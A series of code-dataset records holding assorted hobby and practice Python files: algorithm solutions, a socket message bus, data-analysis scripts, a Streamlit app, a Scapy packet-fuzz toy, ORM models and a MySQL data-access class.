process_df(filename)\n","repo_name":"Alone-668/Shield_MARL","sub_path":"smoothing.py","file_name":"smoothing.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"14066305232","text":"# link: https://leetcode.com/problems/minimize-maximum-of-array/\n\n# binary search \n# time complexity: O(n*log(max(nums)-avg(nums)))\nimport math\nclass Solution:\n def minimizeArrayValue(self, nums: list[int]) -> int:\n def isValid(minVal: int) -> bool:\n space = 0\n for num in nums:\n space += (minVal - num)\n if space < 0:\n return False\n return True\n\n low = math.ceil(sum(nums)//len(nums))\n high = max(nums)\n\n while low < high:\n print(low, high)\n mid = low + (high-low) // 2\n if isValid(mid):\n high = mid\n else:\n low = mid + 1\n\n return low\n\n# prefix sum + greedy\n# time complexity O(n)\nimport math\nclass Solution:\n def minimizeArrayValue(self, nums: list[int]) -> int:\n prefixSum = 0\n minVal = 0\n for i in range(len(nums)):\n prefixSum += nums[i]\n minVal = max(minVal, math.ceil(prefixSum / (i+1)))\n \n return minVal\n","repo_name":"rbrn1999/leetcode-sol","sub_path":"problems/2439. Minimize Maximum of Array.py","file_name":"2439. 
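get_options in the smoothing record above hand-parses a single flag with getopt; argparse gives the same behaviour plus generated usage text. A sketch under the assumption that only the -f/--file option matters:

import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", required=True, help="input CSV path")
args = parser.parse_args(["-f", "results.csv"])   # parse_args() for real argv
print(args.file)                                  # results.csv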
Minimize Maximum of Array.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7941156253","text":"import sys\nimport ast\nsys.path.append(\"..\")\nfrom Komponente.formatiranje import format\nfrom Komponente.JsonXmlAdapter import to_json_from_xml, to_xml_from_json\nimport socket\n\nTCP_IP = socket.gethostname() #localhost\nTCP_PORT = 5005\nBUFFER_SIZE = 1024\nTCP_PORT2 = 5006\n\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind((TCP_IP, TCP_PORT))\ns.listen(0)\n\ns2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns2.bind((TCP_IP, TCP_PORT2))\ns2.listen(0)\n\nconnClient, addrClient = s.accept()\nprint('Connection address:', addrClient,\"\\n\")\n\nconnAdapter, addrAdapter = s2.accept() \nprint('Connection address:', addrAdapter,\"\\n\")\n\nwhile 1:\n data = connClient.recv(BUFFER_SIZE)\n if not data: \n print(\"Svi zahtevi su obradjeni!\")\n break\n\n j =ast.literal_eval(data.decode('utf-8'))\n z = format(j)\n if(z):\n xml = to_xml_from_json(j)\n print(\"Zahtev klijenta u xml formatu:\")\n print(xml.decode())\n connAdapter.send(xml) \n xmlodgovor = connAdapter.recv(BUFFER_SIZE)\n print(\"Odgovor na klijentov zahtev u xml formatu:\")\n print(xmlodgovor.decode())\n odgovorBytes = to_json_from_xml(xmlodgovor)\n connClient.send(odgovorBytes.encode())\n else:\n badformat = {\n \"status\": \"BAD_FORMAT\",\n \"status_code\": \"5000\", #POPRAVITI\n \"payload\": \"Los zahtev sa klijentske strane\"\n }\n badformatbytes= to_xml_from_json(badformat)\n badformatbytessend =to_json_from_xml(badformatbytes)\n connClient.send(badformatbytessend.encode())\n\nconnAdapter.close()\nconnClient.close()\n","repo_name":"ilicka31/RES-TIM10","sub_path":"Komponente/CommunicationBus.py","file_name":"CommunicationBus.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"70656551601","text":"def greeting():\n\tprint(\"Hello from the greeting function\");\n\n\n# the greeting function just says hello\n# invoke or call the function\ngreeting()\n\n\ndef lanle(zzz=\"batman\"):\n\tprint(\"now we're saying\", zzz, \"from another function\")\n\n\nlanle()\nlanle(\"something completely different\")\nlanle(\"fdhfhdhkfbklfjihfnkdl\")\n\n# variables and scope\nmyNumberVariable = 10\n\n\n#returning values from functions (very powerful)\ndef someMath(num1=2,num2=4):\n\tglobal myNumberVariable\n\n#\n\tmyNumberVariable = num1 + num2\n\treturn num1 + num2\n\tprint(myNumberVariable)\n\nsum = someMath()\nprint(\"we are doing some math and getting\", sum)\n\nsum = someMath(10,15)\nprint(\"another math operation with\", sum, \"as the result\")\n\n\n\n","repo_name":"lanle98/Le_L_Python","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19590101718","text":"'''\n这个iForest算法是刘博士(Fei Tony Liu)在莫纳什大学就读期间由陈开明(Kai-Ming Ting)教授和周志华(Zhi-Hua Zhou)教授指导发表的\n第一个版本是在2008年ICDM上,获得年度最佳论文。\n\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.ensemble import IsolationForest\n\n\n\n\n\n\nplt.rcParams['figure.figsize'] = (40.0, 5.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\nrng = np.random.RandomState(42)\nn_samples=6 #样本总数\n\ndataset = 
pd.read_csv('../csv/Water Quality Record.csv', header=0, index_col=0, parse_dates=True)\ndata = dataset.values.reshape(-1)\n\nvalues = dataset.values\ngroups = [0, 1, 2, 3]\n# fig, axs = plt.subplots(1)\n\ndf = pd.DataFrame(dataset) # 整体数据的全部字典类型\ndo = df['Dissolved Oxygen'] # 返回溶解氧那一列,用字典的方式\n\nDO = []\nfor i in range(0, len(do)):\n DO.append([do[i]])\nDO = np.array(DO)\n\n\nclf = IsolationForest(random_state=rng, contamination=0.025) #contamination为异常样本比例\nclf.fit(DO)\nitem = clf.decision_function(DO)\n\npre = clf.predict(DO)\nfor i in range(len(pre)):\n if pre[i] == -1:\n pre[i] = 0\n\nprint(roc_auc_score(pre,item))\n\n\n\n# # fit the model\n# clf = IsolationForest(random_state=rng, contamination=0.025) #contamination为异常样本比例\n# clf.fit(DO)\n#\n# DO_copy = DO\n# m = 0\n#\n#\n#\n# pre = clf.predict(DO)\n# for i in range(len(pre)):\n# if pre[i] == -1:\n# plt.scatter(i,DO[i],c='r',linewidths=1)\n# DO_copy = np.delete(DO_copy,i-m,0)\n# print(i)\n# m+=1\n#\n#\n#\n# plt.plot(DO)\n# plt.text(0,2,str(m),ha='left',c='r')\n# plt.show()\n# print(\"\\n\")\n# print(m)\n# print(\"\\n\")\n# print(len(DO_copy))\n# plt.plot(DO_copy)\n# print(DO_copy.shape)\n# plt.show()\n","repo_name":"pengchen233/EEMD-LSTM-Model","sub_path":"OutlierDetection/IF.py","file_name":"IF.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"8038276015","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : LeetCode_056.py\n# @Author: UpTownCat\n# @Date : 2017/10/4\n\n# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n results = self.handle(intervals)\n results2 = self.handle(results)\n while len(results) != len(results2):\n results = results2\n results2 = self.handle(results)\n results = sorted(results, key = lambda x: x.start)\n return results\n def handle(self, intervals):\n for i in range(0, len(intervals)):\n interval = intervals[i]\n if not interval:\n continue\n j = 0\n for j in range(0, len(intervals)):\n if i == j:\n continue\n interval2 = intervals[j]\n if interval2 and interval2.end < interval.end and interval2.end >= interval.start and interval2.start < interval.start:\n interval.start = interval2.start\n interval2, intervals[j] = None, None\n if interval2 and interval.start >= interval2.start and interval.end <= interval2.end:\n interval.start, interval.end = interval2.start, interval2.end\n interval2, intervals[j] = None, None\n if interval2 and interval.start < interval2.start and interval.end > interval2.end:\n interval2, intervals[j] = None, None\n if interval2 and interval.start < interval2.start and interval2.start <= interval.end:\n interval.end = interval2.end\n interval2, intervals[j] = None, None\n results = list(filter(lambda interval: interval, intervals))\n return results\n# intervals = [Interval(1, 3), Interval(2, 6), Interval(8, 10), Interval(15, 18)]\n# intervals = [Interval(1, 4), Interval(2, 3)]\nlists = 
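The merge/handle pair in the intervals record above loops until it reaches a fixed point; the standard single pass sorts by start once and extends the last kept interval. A sketch on plain [start, end] lists, checked against the record's own example:

def merge(intervals):
    out = []
    for s, e in sorted(intervals):
        if out and s <= out[-1][1]:          # overlaps (or touches) the last kept
            out[-1][1] = max(out[-1][1], e)
        else:
            out.append([s, e])
    return out

assert merge([[1, 3], [2, 6], [8, 10], [15, 18]]) == [[1, 6], [8, 10], [15, 18]]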
[[115,121],[319,325],[30,37],[95,101],[445,452],[125,126],[172,172],[29,32],[443,452],[465,466],[420,424],[79,84],[203,206],[352,352],[472,479],[214,221],[124,127],[326,330],[253,254],[351,359],[359,367],[281,284],[188,190],[86,89],[321,322],[106,110],[237,243],[359,359],[431,432],[353,357],[99,106],[343,348],[452,461],[229,234],[91,93],[255,257],[112,120],[185,188],[51,55],[136,140],[27,30],[318,323],[281,281],[57,59],[241,243],[116,118],[181,183],[119,123],[481,482],[191,195],[485,494],[78,86],[39,45],[103,103],[240,249],[167,174],[334,341],[384,389],[367,371],[328,329],[56,62],[5,13],[460,465],[224,228],[178,185],[70,73],[418,427],[113,121],[117,123],[400,407],[308,317],[476,478],[257,260],[110,116],[7,7],[437,442],[438,443],[5,14],[420,421],[193,201],[201,204],[113,122],[412,419],[429,438],[443,443],[238,239],[249,256],[246,254],[280,288],[335,344],[498,502],[54,60],[419,421],[335,344],[493,501],[289,293],[292,295],[166,172],[482,487],[438,443],[277,285]]\nintervals = []\nfor interval in lists:\n intervals.append(Interval(interval[0], interval[1]))\nsolution = Solution()\n# 193,201],[201,204]\nintervals3 = [Interval(201, 206), Interval(191, 195), Interval(193, 201), Interval(201, 204), Interval(203, 206)]\nfor interval in solution.merge(intervals):\n print(interval.start, interval.end)\n\n\n\n# results = list(sorted(intervals, key = lambda interval: interval.start))\n# for result in results:\n# print(result.start, result.end)\n# map(lambda interval: print('[%d, %d]' % (interval.start, interval.end)), solution.merge(intervals))\n# for interval ins%d]' % (interval.start, interval.end))\n# interval = intervals[2]\n# intervals[2] = None\n# print(interval.start)\n\n # if interval.end >= interval2.start and interval.end < interval2.end and interval.start < interval2.end:\n # interval.end = interval2.end\n # interval2 = None\n # intervals[j] = None\n # if interval2 and interval.start <= interval2.start and interval.end >= interval2.end:\n # interval2 = None\n # intervals[j] = None\n # if interval2 and interval.start >= interval2.start and interval.end <= interval2.end:\n # interval.start = interval2.start\n # interval.end = interval2.end\n # interval2 = None\n # intervals[j] = None\n # if interval2 and interval.start == interval2.end:\n # interval.start = interval2.start\n # interval2 = None\n # intervals[j] = None","repo_name":"UpTownCat/LeetCode","sub_path":"LeetCode_056.py","file_name":"LeetCode_056.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31122072612","text":"import random\nszam1 = random.randint(1,10)\nszam2 = random.randint(1,10)\n\nprint(\"Gondoltam két számra 1 és 10 között.\")\n\n#1\nif (szam1%2==0):\n print(\"Az első szám páros.\")\nelse:\n print(\"Az első szám páratlan.\")\nkerdes1 = input(\"Érdekel, hogy az első szám, amelyre gondoltam, osztható-e 3-mal? (igen/nem)\")\nif kerdes1 == \"igen\":\n if (szam1%3==0):\n print(\"A szám osztható 3-mal.\")\n else:\n print(\"A szám nem osztható 3-mal.\")\nelse:\n print(\"Hát akkor nem.\")\nkerdes2 = input(\"Érdekel az első szám amelyre gondoltam? (igen/nem)\")\nif kerdes2 == \"igen\":\n print(szam1)\nelse:\n print(\"Szóval nem.\")\n\n#2\nif (szam2%2==0):\n print(\"A második szám páros.\")\nelse:\n print(\"A második szám páratlan.\")\nkerdes1 = input(\"Érdekel, hogy a második szám, amelyre gondoltam, osztható-e 3-mal? 
(igen/nem)\")\nif kerdes1 == \"igen\":\n if (szam2%3==0):\n print(\"A szám osztható 3-mal.\")\n else:\n print(\"A szám nem osztható 3-mal.\")\nelse:\n print(\"Hát akkor nem.\")\nkerdes2 = input(\"Érdekel a második szám amelyre gondoltam? (igen/nem)\")\nif kerdes2 == \"igen\":\n print(szam2)\nelse:\n print(\"Szóval nem.\")","repo_name":"alexgoston/python","sub_path":"random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17838664318","text":"import os\nimport pandas as pd\n\ndef make_train_test_csv(cls, orgin_data_path=None, all_data_path=None, time_step=60):\n \"\"\"\n 制作股票分类数据\n orgin_data_path:原始数据存放路径\n all_data_path:制作成可被算法接收的文件存放路径\n \"\"\"\n basic_path = os.path.dirname(os.path.abspath(__file__))\n # 初始化源文件路径和存储文件路径\n if orgin_data_path is None:\n orgin_data_path = os.path.join(basic_path, \"origin_data.csv\")\n if all_data_path is None:\n all_data_path = os.path.join(basic_path, \"all_data.csv\")\n # 读取原始数据,只保留需要使用的列\n total_data = pd.read_csv(orgin_data_path,\n usecols=[\"open_hfq\", \"high_hfq\", \"low_hfq\", \"close_hfq\", \"turnover\", \"volume\",\n \"cir_market_value\", \"stock_date\", \"stock_num\"])\n # 根据股票代码排序,相同的股票代码按照交易日期排序。\n # inplace参数表示不需要返回排序后的结果,直接覆盖原变量即可\n total_data.sort_values(by=['stock_num', 'stock_date'], inplace=True)\n\n # 根据股票代码分组\n g_stock_num = total_data.groupby(by=[\"stock_num\"])\n # 针对每一组股票,分别计算收益gate,其定义为:(下下一个交易日的开盘价 / 下一个交易日的开盘价) - 1\n # 对gate乘以100,使之变成百分比形式(0.09 -> 9,表示9%)\n # 使用np.round函数保存两位小数,之后的数字丢弃(9.8346474 - > 9.83)\n total_data[\"gate\"] = np.round((100 * (g_stock_num.shift(-2)[\"open_hfq\"] / g_stock_num.shift(-1)[\"open_hfq\"] - 1)),\n 2)\n # 重新调整列的顺序,为接下来处理成输入、输出形式做准备\n total_data = total_data[\n [\"open_hfq\", \"high_hfq\", \"low_hfq\", \"close_hfq\", \"turnover\", \"volume\", \"cir_market_value\", \"gate\", \"stock_date\",\n \"stock_num\"]]\n\n # 将调整列顺序后的代码,重新按照股票代码分组\n g_stock_num = total_data.groupby(by=[\"stock_num\"])\n\n # 拿time_step个交易日的数据(默认为60个交易日),进行标准化\n def func_stand(data_one_stock_num, time_step):\n # 通过apply进入函数内的数据,其股票名为data_one_stock_num.name,类型为pd.dataFrame\n # 即,进入此函数的数据为所有名为data_one_stock_num.name的集合\n # dataFrame.shape:(num , 11), num是这个股票出现的次数\n\n for colu_name in data_one_stock_num.columns:\n if colu_name in [\"gate\", \"stock_date\", \"stock_num\"]:\n continue\n # 只针对输入数据进行标准化,标准化算法为: (原始数据 - 平均值) / 标准差\n # 这里每一次for循环,都拿出了1列数据,针对这一列进行标准化并覆盖原数据\n data_one_stock_num[colu_name] = (\n (data_one_stock_num[colu_name] - data_one_stock_num[colu_name].rolling(time_step).mean()) /\n data_one_stock_num[colu_name].rolling(time_step).std())\n return data_one_stock_num\n\n # 将经过标准化的数据处理成训练集和测试集可接受的形式\n def func_train_test_data(data_one_stock_num, time_step):\n print(\"正在处理的股票代码:code:%06d\" % data_one_stock_num.name)\n\n # 提取输入列(对应train_x)\n data_temp_x = data_one_stock_num[\n [\"open_hfq\", \"high_hfq\", \"low_hfq\", \"close_hfq\", \"turnover\", \"volume\", \"cir_market_value\"]]\n # 提取输出列(对应train_y)\n data_temp_y = data_one_stock_num[[\"gate\", \"stock_date\", \"stock_num\"]]\n data_res = []\n # for循环从time_step - 1开始,因为前time_step - 1个数据不满足time_step条件\n # 例如:time_step为60,即需要60个交易日的数据制成训练集的一个输入,但某只股票因为停牌等原因,只有50个交易日的数据。那么它就可以跳过了,不满足最低数目的要求\n for i in range(time_step - 1, len(data_temp_x.index)):\n data_res.append(data_temp_x.iloc[i - time_step + 1: i + 1].values.reshape(1, time_step * 7).tolist() +\n data_temp_y.iloc[i][[\"gate\", \"stock_date\", \"stock_num\"]].values.reshape(1, 3).tolist())\n if 
len(data_res) != 0:\n # 使用末尾添加的形式,将各个股票的数据依次添加进设定的路径中。\n # index参数表示是否需添加一列序号,header表示是否需要添加列头,mode表示选择哪一种模型进行csv操作(类似于open函数的模型)\n pd.DataFrame(data_res).to_csv(all_data_path, index=False, header=False, mode=\"a\")\n return data_one_stock_num\n\n # 数据标准化\n data_after_stand = g_stock_num.apply(func_stand, time_step=time_step)\n data_after_stand.dropna(inplace=True)\n # 将数据转成训练集合的形式\n g_stock_num = data_after_stand.groupby(by=[\"stock_num\"])\n # 清空接收路径下的文件,初始化列名\n pd.DataFrame({\"0\": [], \"1\": []}).to_csv(all_data_path, index=False)\n g_stock_num.apply(func_train_test_data, time_step=time_step)","repo_name":"busizshen/tusharetest","sub_path":"tushareTest/oneTick4.py","file_name":"oneTick4.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"37062854221","text":"import csv\n\nresultdir = '../CSV_data/'\n\nTHI_DAT = {}\n\nwith open('../CSV_data/things_data.csv') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[0] != \"level_id\":\n if \"level_\"+row[0] not in THI_DAT.keys():\n THI_DAT[\"level_\" + row[0]] = []\n THI_DAT[\"level_\"+row[0]].append({\n \"episode\": row[1],\n \"mission\": row[2],\n \"x_position\": row[3],\n \"y_position\": row[4],\n \"direction\": row[5],\n \"type\": row[6],\n \"flags\": row[7],\n })\n\nnew_things = {}\nunique_things = []\nnumber_of_things = {}\n\nfor i in range(1, 28):\n currLvl = \"level_\"+str(i)\n things = []\n wall_tex = []\n new_things[currLvl] = []\n for row in THI_DAT[currLvl]:\n t_is_new_thing = True\n t = row[\"type\"].upper()\n for v in new_things.values():\n if t in v:\n t_is_new_thing = False\n if t not in unique_things:\n unique_things.append(t)\n if t_is_new_thing:\n things.append(t)\n new_things[currLvl] += list(dict.fromkeys(things))\n\nunique_things.sort(key=int)\n\nfor i in range(1, 28):\n currLvl = \"level_\"+str(i)\n things = []\n wall_tex = []\n number_of_things[currLvl] = {}\n for thing in unique_things:\n number_of_things[currLvl][thing] = 0\n for row in THI_DAT[currLvl]:\n t = row[\"type\"].upper()\n number_of_things[currLvl][t] += 1\n\nnames = {\n \"level_1\": \"E1M1\",\n \"level_2\": \"E1M2\",\n \"level_3\": \"E1M3\",\n \"level_4\": \"E1M4\",\n \"level_5\": \"E1M5\",\n \"level_6\": \"E1M6\",\n \"level_7\": \"E1M7\",\n \"level_8\": \"E1M8\",\n \"level_9\": \"E1M9\",\n \"level_10\": \"E2M1\",\n \"level_11\": \"E2M2\",\n \"level_12\": \"E2M3\",\n \"level_13\": \"E2M4\",\n \"level_14\": \"E2M5\",\n \"level_15\": \"E2M6\",\n \"level_16\": \"E2M7\",\n \"level_17\": \"E2M8\",\n \"level_18\": \"E2M9\",\n \"level_19\": \"E3M1\",\n \"level_20\": \"E3M2\",\n \"level_21\": \"E3M3\",\n \"level_22\": \"E3M4\",\n \"level_23\": \"E3M5\",\n \"level_24\": \"E3M6\",\n \"level_25\": \"E3M7\",\n \"level_26\": \"E3M8\",\n \"level_27\": \"E3M9\",\n}\n\nwith open(resultdir+\"things_numbers.csv\", 'w', encoding='UTF-8') as outputFile:\n writer = csv.writer(outputFile)\n writer.writerow([\"level_id\", \"name\"]+unique_things)\n for key, row in number_of_things.items():\n writer.writerow([key, names[key]]+[v for v in row.values()])\n","repo_name":"DigitalDW/memoire_csv","sub_path":"data_analysis/things_numbers.py","file_name":"things_numbers.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14486219456","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom scapy.fields import *\nfrom scapy.packet import Packet, fuzz, Raw\nfrom 
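func_stand in the stock-pipeline record above is a trailing-window z-score, (x - rolling mean) / rolling std. On a toy series the shape of the result is easy to see:

import pandas as pd

s = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0])
z = (s - s.rolling(3).mean()) / s.rolling(3).std()
print(z.tolist())   # [nan, nan, 1.0, 1.0, 1.0]: NaN until the window fills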
cpf.misc.utils import hexdump\n\n\nclass Foo(Packet):\n fields_desc = [\n ByteField(\"type\", 0xff),\n StrFixedLenField(\"sep\", \"\\xaa\\xbb\", 2)\n ]\n\n def post_build(self, p, pay):\n l = len(pay)\n p = p[:1] + hex(l)[2:] + p[2:]\n return p + pay\n\n\nif __name__ == '__main__':\n p = Foo() / Raw(\"X\" * 32)\n hexdump(str(fuzz(p)))\n","repo_name":"hac425xxx/cpf","sub_path":"test/scapy/make_packet.py","file_name":"make_packet.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"15634548329","text":"import joblib\nimport numpy as np\nimport pandas as pd\nimport streamlit\n\nmodel = open(\".\\Streamlit-Deployment\\linear_regression_model_for_Streamlit.pkl\", \"rb\")\nlr_model = joblib.load(model)\n\ndef lr_prediction(alc, vol, sul, diol):\n pred_arr = np.array([alc, vol, sul, diol])\n preds = pred_arr.reshape(1, -1)\n preds = preds.astype(np.float64)\n model_prediction = lr_model.predict(preds)\n return model_prediction\n\n\ndef run():\n streamlit.title(\"Linear Regression Model Deployment\")\n html_temp = \"\"\"\n \"\"\"\n streamlit.markdown(html_temp)\n alc = streamlit.text_input(\"Alcohol\")\n vol = streamlit.text_input(\"volatile acidity\")\n sul = streamlit.text_input(\"sulphates\")\n dio = streamlit.text_input(\"total sulfur dioxide\")\n\n prediction = \"\"\n\n if streamlit.button(\"predict\"):\n prediction = lr_prediction(alc, vol, sul, dio)\n\n streamlit.success(\"The prediction by Model: {}\".format(prediction))\n\nif __name__ == \"__main__\":\n run()\n\n# 8.8, 0.27, 0.45, 45","repo_name":"pirate-datenscienticfic/100-Days-of-Machine-Learning","sub_path":"Streamlit-Deployment/LR_model/StreamlitApp.py","file_name":"StreamlitApp.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33824285143","text":"from connect_database import *\nfrom peewee import *\n\n\nclass BaseModel(Model):\n \"\"\"A base model that will use our Postgresql database\"\"\"\n\n def __str__(self):\n r = {}\n for k in self._data.keys():\n try:\n r[k] = str(getattr(self, k))\n except:\n r[k] = json.dumps(getattr(self, k))\n return str(r)\n\n class Meta:\n database = ConnectDatabase.db\n\n\n# class User(BaseModel):\n# username = CharField()\n# password = CharField()\n\n\nclass Common(BaseModel):\n description = CharField()\n position = IntegerField()\n\n\nclass Board(Common):\n title = CharField()\n date = CharField()\n # card = ForeignKeyField(Card, null=True)\n\n\nclass Card(Common):\n status = CharField()\n board = ForeignKeyField(Board)\n","repo_name":"CodecoolBP20162/web-with-python-proman-bugbusters","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2140241262","text":"# 버스 노선\n\nimport sys\ninput = sys.stdin.readline\n\nN = int(input().strip())\nM = int(input().strip())\nlines = [list(map(int, input().strip().split())) for _ in range(M)]\nstretch = []\nisokay = [True for _ in range(M+1)]\nisokay[0] = False\n\nfor i,v in enumerate(lines):\n if v[0] > v[1]:\n stretch.append((v[0],v[1]+N,i+1))\n else:\n stretch.append((v[0],v[1],i+1))\n stretch.append((v[0]+N, v[1]+N, i+1))\n\nstretch.sort(key=lambda line: (line[0], -line[1]))\n\nend = 0\nfor (a,b,i) in stretch:\n if b <= end:\n isokay[i] = False\n end = max(end, b)\n\nans = []\nfor i,v in enumerate(isokay):\n if 
v:\n ans.append(i)\n\nprint(\" \".join(map(str, ans)))\n# import sys\n# input = sys.stdin.readline\n\n# N = int(input())\n# M = int(input())\n# lines = [tuple(map(int, input().strip().split())) for _ in range(M)]\n# stretcheds = []\n\n# for i, (b, e) in enumerate(lines):\n# if b < e:\n# stretcheds.append((i+1, b, e))\n# stretcheds.append((i+1, b + N, e + N))\n# else:\n# stretcheds.append((i+1, b, e + N))\n\n# stretcheds.sort(key=lambda line: (line[1], -line[2]))\n\n# deleted = set()\n# most_far = 0\n# for i, b, e in stretcheds:\n# if e <= most_far:\n# deleted.add(i)\n# most_far = max(most_far, e)\n\n# ans = []\n# for i in range(1, M+1):\n# if i not in deleted:\n# ans.append(i)\n\n# print(*ans)","repo_name":"mi2ntae/Algorithm","sub_path":"python/2021/01-05/10165.py","file_name":"10165.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33348558638","text":"# day21\nfrom collections import Counter\nfrom collections import defaultdict\n\n\ndef allergen(input_str):\n lines = [line for line in input_str.split('\\n') if line]\n allergen_dict = defaultdict(list)\n all_ingredients = []\n for line in lines:\n ingredients = line.split('(')[0].strip().split()\n allergens = [\n item.strip(',')\n for item in line.split('(')[1].strip(')').split()[1:]\n ]\n all_ingredients += ingredients\n # print(ingredients)\n # print(allergens)\n for alg in allergens:\n allergen_dict[alg].append(set(ingredients))\n ingredients_counter = Counter(all_ingredients)\n allergen_dict_pruned = {\n key: set.intersection(*value)\n for key, value in allergen_dict.items()\n }\n # build the mapping from bottom up\n allergen_dict_final = {}\n confirmed_ingredients = set()\n while len(allergen_dict_final) < len(allergen_dict_pruned):\n for key, value in allergen_dict_pruned.items():\n if len(value) == 1:\n allergen_dict_final[key] = next(iter(value))\n confirmed_ingredients.add(next(iter(value)))\n allergen_dict_pruned = {\n key: value.difference(confirmed_ingredients)\n for key, value in allergen_dict_pruned.items()\n }\n\n count_no_known_allergen = sum([\n value for key, value in ingredients_counter.items()\n if key not in confirmed_ingredients\n ])\n algs = list(allergen_dict_final.keys())\n algs.sort()\n food = ','.join([allergen_dict_final[alg] for alg in algs])\n return count_no_known_allergen, food\n\n\ndef main():\n with open('./input_folder/day21.txt', encoding='UTF-8') as fh:\n input_text = fh.read()\n # part1 and part2\n count_no_known_allergen, food = allergen(input_text)\n assert count_no_known_allergen == 2230\n # part2\n assert food == 'qqskn,ccvnlbp,tcm,jnqcd,qjqb,xjqd,xhzr,cjxv'\n print('success!!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nathan-zym268/aoc-2020","sub_path":"day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19110805593","text":"import datetime\nimport logging\nfrom typing import Optional\n\nimport pymysql\nfrom pymysql import err\n\nfrom src.config import config\nfrom src.db.entity import AnnouncementEntity, City, User, AnnouncementType, BlockedUser\n\n\ndef create_connection():\n return pymysql.connect(\n host=config.DB_HOST,\n port=config.DB_PORT,\n user=config.DB_USERNAME,\n passwd=config.DB_PASSWORD,\n database=config.DB_NAME,\n cursorclass=pymysql.cursors.DictCursor)\n\n\nADMIN_ID_MAX = 1000\n\n\nclass Dao:\n\n def __init__(self):\n 
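The +N arithmetic in the bus-route record above linearizes the circular line: a route that wraps past station N gets its end shifted by N, and non-wrapping routes are laid down a second time shifted by N so a wrapping route can still contain them. A containment check with a toy N:

N = 10

def stretch(b, e):
    return (b, e + N) if b > e else (b, e)     # unwrap a route crossing station N

big, small = stretch(8, 2), stretch(9, 1)      # (8, 12) and (9, 11)
assert big[0] <= small[0] and small[1] <= big[1]   # route (9, 1) is redundant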
self.connection = create_connection()\n\n def _select_one(self, query, parameters):\n try:\n with self.connection.cursor() as cursor:\n sql_query = query.replace(\"'\", \"\")\n logging.debug(f\"Execute 'select_one' query: {sql_query}\")\n logging.debug(f'Parameters: {parameters}')\n cursor.execute(sql_query, parameters)\n logging.debug(\"Successfully selected\")\n return cursor.fetchone()\n except Exception as e:\n logging.error(\"Exception in db: %s\", e)\n self.connection = create_connection()\n logging.info(\"Recreated connection\")\n return self._select_one(query, parameters)\n\n def _select_list(self, query, parameters) -> list:\n try:\n with self.connection.cursor() as cursor:\n sql_query = query.replace(\"'\", \"\")\n logging.debug(f\"Execute 'select_list' query: {sql_query}\")\n logging.debug(f'Parameters: {parameters}')\n cursor.execute(sql_query, parameters)\n logging.debug(\"Successfully selected\")\n return cursor.fetchall()\n except Exception as e:\n logging.error(\"Exception in db: %s\", e)\n self.connection = create_connection()\n logging.info(\"Recreated connection\")\n return self._select_list(query, parameters)\n\n def _execute(self, query, parameters):\n try:\n with self.connection.cursor() as cursor:\n sql_query = query.replace(\"'\", \"\")\n logging.debug(f\"Execute query: {sql_query}\")\n logging.debug(f'Parameters: {parameters}')\n cursor.execute(sql_query, parameters)\n logging.debug(\"Successfully executed\")\n self.connection.commit()\n except Exception as e:\n logging.error(\"Exception in db: %s\", e)\n self.connection = create_connection()\n logging.info(\"Recreated connection\")\n return self._execute(query, parameters)\n\n def close(self):\n logging.info(\"Closing connection\")\n try:\n self.connection.close()\n except err.Error as e:\n logging.info(\"Exception during closing connection: %s\", e)\n\n\nclass AnnouncementDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_ANNOUNCEMENT\n\n def save(self, ann: AnnouncementEntity, approved=True):\n logging.debug(f\"Create {ann.to_str()}\")\n query = f\"\"\"\n INSERT 